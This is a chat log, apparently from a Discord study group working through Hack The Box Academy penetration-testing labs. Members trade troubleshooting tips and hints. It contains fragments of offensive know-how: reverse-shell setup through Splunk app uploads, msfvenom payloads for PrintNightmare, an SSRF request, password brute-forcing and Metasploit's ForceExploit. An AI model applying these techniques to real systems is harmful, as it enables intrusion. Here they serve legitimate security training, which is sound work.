usernames and passwords are given in advance once u spawn the lab

make sure that you installed impacket-scripts python requirements in a virtual environment python3 -m venv <PickName> ( assuming that you removed impacket-scripts from system using apt and installed impacket via github)

Hi guys currently doing (Attacking Common Applications , Attacking Splunk ) module yet right after uploading a Python or a PowerShell script i yet still dont have a shell back not sure what im doing wrong

does it have to be done using venv?
I just ran this on my machine

sudo apt remove python3-impacket
sudo apt remove impacket-scripts
git clone -q https://github.com/fortra/impacket;cd impacket
sudo python3 -m pip install .

no it doesnt

did you change the ip?

yes i have

is port 4321 ok ?

as a rev shell

yes

did you change the input.conf to the right script?

havent looked into that one yet

do i needed customed and upload that first before the actual rev script ?

it should all be in one zip file

just point the input.conf to the script you want to run then zip

ill try it out thanks man

In the Password attacks module, the easy lab, when I try to brute force the FTP, I get nothing and it takes so much time, I went searching of what to do, but i run the same command as other people, why it does not work for me? I tried using the lists from the module and mutate the list too

You need to use the list provided in that section. It's under Resources -> https://academy.hackthebox.com/storage/resources/Password-Attacks.zip

you're given a username and password list

@surreal rain @urban sage hey guys could you please add me back and answer my dms

it’s urgent

Hi, can you help me?

machine 10.10.11.42 Administrator
I logged in with the user michael with evil-winrm
I was able to change the password for benjamin and I logged in with smbclient
but I'm stuck there and I can't move forward

best to post the module/section you're on

Hello! Working on the web request module, to download using curl i am saying (curl -0 IP/download.php) however i cant find the download or tell if it is downloading

it'll download to whichever location you specify with your -O parameter, if you don't specify a folder and only a file then it'll save in your current working directory

is whatever directory im in with -ls the current working directory?

you can type pwd to print the working directory

any suggestions?

so it showd that my working directory is downloads but when i do -ls there is no files

then you probably didn't download it correctly. are you typine ls or -ls ? the command is just ls.

using ls, sorry i dont know why i typed -ls

k so first, don't post spoilers like the flag

second, you're using 0 not O.. O is for Output

so use -O not -0

and you also have to specify the file name in the output

curl http://website.htb/file.exe -O file.exe

oh, i see that maes sense. thank you

Not with capital -O 🤓☝️

Hello, I'm working through the Attacking Common Services module, specifically Attacking DNS. I'm trying to run subbrute per the hint and no matter what I do, I get a python error. I did update resolvers to ns.inlanefreight.htb. What am I doing wrong? I installed subbrute as listed in the example in the module reading

┌──(stinger㉿kali)-[~/Tools/subbrute]
└─$ ./subbrute.py -s names_small.txt -r resolvers.txt -p inlanefreight.htb
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
Process lookup-3:
Traceback (most recent call last):
File "/usr/lib/python3.11/multiprocessing/process.py", line 314, in _bootstrap
self.run()
File "/home/stinger/Tools/subbrute/./subbrute.py", line 422, in run
response = self.check(hostname, query_type, timeout_retries)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/stinger/Tools/subbrute/./subbrute.py", line 342, in check
resp = self.resolver.query(host)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/stinger/Tools/subbrute/./subbrute.py", line 57, in query
name_server = self.get_ns()
^^^^^^^^^^^^^
File "/home/stinger/Tools/subbrute/./subbrute.py", line 107, in get_ns
ret = self.nameservers[self.pos]
~~~~~~~~~~~~~~~~^^^^^^^^^^
IndexError: list index out of range

resolver could be the root of the issue

nslookup ns.inlanefreight.htb

to confirm

┌──(stinger㉿kali)-[~/Tools/subbrute]
└─$ nslookup ns.inlanefreight.htb
Server: 10.211.55.1
Address: 10.211.55.1#53

** server can't find ns.inlanefreight.htb: NXDOMAIN

check your resolvers.txt make sure it's correct

What should that look like?

its going to contain your nameserver(s), i don't know off the top of my head

it should just be a list of IP addresses or just one IP

i believe the module goes over how to create it

if it's using a hostname make sure it's in your hosts file

Oh, I was following what the reading did which added the domain name. I did update my etc/hosts just now and added the IP to my etc/hosts and it seems like it may be working now

Thank you! Hopefully that will get me the flag

any quick fix for Targets not spawning?

ctrl + shift + r on the page and try again

I have refreshed page, revisited, etc. numerous times

The resolver wont be that ns.inlanefreight.htb in this case as it is linked to 127.0.0.1. Put the IP given as target in resolver.txt

That helped me

WOah, thanks heaps

that worked

is this a super refresh?

it's a hard refresh, completely ignores cache and re-downloads the whole page fresh from the site

Amazing, learning something new everyday

hell yeah

came on here for the same issue

worked for me as well

thanks HAHA

Thank you! I did that and it seemed to be working, but had an early morning with one of my kids, so I am going to try again tomorrow and let it run longer when I have more energy

Lovely!

Try to exploit the upload form to read the flag found at the root directory "/".

Can sm dm me I need help with sm badly

with what?

I’m trying to learn and I wanted to know if sm could help me get started

what is sm?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Someone

Sorry I’m used to texting my friends like that

always include the module/section you're in

This is attacking common services - HARD lab

alright try to post your question without spoiling content please

Oh soz

@up
Hello,
It's about the gathering information - web edition. On the aknowledge assesment.
I used ffuf on the third question but i don't got any information

dm me

I am trying to bruteforce a service with hydra and username is known, and the password is in the txt file. However, the issue is, hydra is not cracking the login, provided the username and the file (even tho the pass is in the file)

Stuck on this one (Attacking Common Apps § Assessment Part 1) now myself because ||/m******/****|| is returning a 404 error which is keeping me bogged down trying to use ffuf to figure out what non-standard directory name is being used for the ||T******t|| manager, if any ― any ideas? @cloud urchin?

idk which section you're on

Attacking Common Applications § Assessment Part 1

sorry can't help i didn't make any notes on that

anyone who's has completed attacking common services module? need help

Hi guys, is there a way to reset the exercises in modules?

no

@fathom pendant any ideas?

Your username DEMON#7817

He talked to a four-year-old girl and I’m in a party with the guys talking to him

@everybody

this isn't the place that can help you with that. contact the police.

The cop want help it’s online

@coarse monolith this is not the place

they can subpeona the isp, they are actually the people who can help

Isn’t this a hacker group chat?

no

What the fuck is this then?

Google it and you will find out

this is a study group

It's a study group for penetration testing certifications. Not the place to send a request for someone to hack someone else off platform.

will htb allow us to reset exercises in the future by any chance?

i have no idea i don't work for them, i have never heard of it being planned though. my guess is that it's somehow tied to unlocking the module forever if you complete it, but that's pure speculation. like if you reset your progress you may not 'own' it anymore in the system how it's coded. could be totally wrong.

ahh I see, I would really like for them to allow us to reset the exercises as some of them I did a while back at uni but im coming back to them now after a while, and want to refresh my memory and practice too. It would definitely be helpful if htb thought about doing this, thanks anyways 🙂

you can always just go through the module again and spawn the target without looking at the answers

Was just testing out tmux logging. The log file it created has escape sequences. I followed the steps in the Documentation & Reporting module. Is there a way to get a plaintext output for the logs?

anyone survived MSSQL, Exchange, and SCCM Attacks
Skills Assessment ? Exchange seems slow af

having an issue with my nc shell on unified keep gettin strange sysmbols .

Hi guys, having an issue installing requirments.txt for xsstrike

Pip3 instead

ok thanks let me try

I think you have to specify the file

With -r

ok let me try

i dont have module named pip3

i tried with -r too

Just use pip3 alone

ok let metry

i keep getting this when i try with other means

You gotta make a venv or use —break-system-packages to ignore that and potentially mess something up

do you know how I can make a new venv?

It shows you how in the error

ok thanks, im using chat gpt for now as i started wit that

Just do --break-system-packages

With pip3

ok thanks hold on

You goober

My brother in christ

pip3 install -r requirements.txt --break-system-packages

thank u 😂

or just

You're the reason shampoo bottles have instructions

source bin/activate
pip3 install -r requirements.txt```

no need for roasting my brudda

Too much work

sorry I thought I had already said I installed requirements.txt 😂 what I was facing was another problem, but I managed to solve that now

guys do you know what is the issue here with printnightmare ?

You need accessible payload file.
Make one with msfvenom and put it in accessible SMB share

Maybe try the current directory instead of the file

Still waiting on this one. Attempts to access the vulnerable application's vulnerable interface always return 404 — any idea why?

its works thanks @safe star

Not sure but take another look at the version number @foggy monolith

What can mess up netcat listener? Trying to do Server Side Attacks -> Identifying SSRF module. Not receiving anything trying different things in both ZAP and BURP.

`POST /index.php HTTP/1.1
Host: 10.199.14.133
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

dateserver=http://10.199.14.133/availability.php&date=2024-01-01`

As I understand it, it should be my IP there? (tried, but changed for this post).

EDIT: Figured it out, only dataserver should be changed, but I was initially using outoing ip, not VPN IP.

The only thing that comes up for that version is ||CVE-2019-0232|| which I tried a Metasploit module for already, to no avail.

Trying the examples to see if there's anything there — also nothing.

Hey guys currently in ("Notetaking & Organization - Notetaking & Organization ") and the question is "Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.) " and so ive tried "Ctrl+B Alt+2" in brackets yet im not sure what im doing wrong any more hints please thank you.

Figured it out. Metasploit was falsely reporting as not vulnerable when it was, so needed to use ForceExploit.

why alt + 2?

I’m not a hacker at all

I want to learn but I can’t

It’s hard

Starting off with “I can’t” is definitely the way yeah

Bruhh

I can’t it’s so hard

No one is saying you need to start with kernel exploitation

What is taht

Bruh

Hard

Ok

I have to learn cording

Hard

You are a pro hacker

💀

Well, with saying "I am not a hacker", you are already following an important principle of not sharing publicly that you are a hacker. Keep it up! If you want confidence booster, try TryHackMe to half a difficulty.

Module: Attacking Web Applications with Ffuf
Section: Skills Assessment - Web Fuzzing
Hints says Use 'PORT' instead of the port shown above, like http://xxxxx.academy.htb:PORT/xxxxxxx ..etc but I don't understand what it means

PORT is a number. A regular website is either 80 (http) or 443 (https) but can also be 8080 or anything else.

Your vulnerable machine likely starts on a specific port. You need to replace the placeholder.

I know but it says that I should not use port shown above and port shown above is 50925 Target(s): 94.237.55.189:50925

So I should use another port?

Use Target's port. I am not sure where it says this, I can't find it in that room.

lol.

hmmmmm

im stuck on "exploitation of pdf generation vulnerabilities". the hint says to look for "alternative common ports for web applications" but i cant find any viable options. anyone that can give me a further hint?

to be precise it says: "enumerate for..."

I believe it was 8000 or 8080

Hey, how's it going? I'm new to this and I'm a bit stuck with the Alert machine lol
I've tried a lot of things, ran manual exploits, used payload dictionaries to test different LFI variations, but nothing seems to be working,
I even tried using the discovered subdomain and concatenating it in the payload, but it still doesn't give me any info. I've been at it for 2 days now, haha.

Yeaaaa

ask in #1309940693002752140

I’m goi going to do it

Mh

I dont have access lol

go and read #welcome

Curious about this one too. Even went so far as to run find / -iname "flag.txt" 2>/dev/null without the . (thus starting at the root directory and searching through the whole file system) and, still nothing.

i mean you are www-data

should prob find a way to escalate if find doesnt find the flag

check here #modules message
I assume your machine syncs it clock back to normal after you sync it with the dc, so it undoes the syncing.

leme check

guru ji ur great , its working

Working on the module detecting windows attacks with splunk the section detecting unconstrained delegation/constrained delegation attacks. The question "Enter the name of the other computer on which there are traces of reconnaissance related to Unconstrained Delegation as your answer. Answer format: _.corp.local. When I run the splunk query I get back two machines Blue and DC01. Looking at the events for each machine I can't tell why the correct answer was the correct answer. They both seem to be correct. Can anyone share some info on this?

There's definitely ||autodiscover_new.php|| but no way to use that locally using any extant exploits (||46621.py|| requires you to be unauthenticated, unless I'm missing something)

also, the flag might not be actually named flag.txt

unless it tells you it is

Still not helping here. All the privesc vulnerabilities I'm seeing require horizontal from www-data to nagios first, which is where the problem lies.

Okay, so that's another deceptively worded module. Says it's flag.txt but it's really <random hex digits>_flag.txt — someone in #1234357888114364508 needs to update the module so it says that.

Hi Everyone, i have a connection problem in SOC Role Path Windows Attacks&Defende Module
Can anyone help me?

ssh kali@10.129.152.37 (Target_IP)
ssh: connect to host 10.129.152.37 port 22: Connection refused

i am using a Pwnbox

Anyone else having trouble connecting to the pwnbox?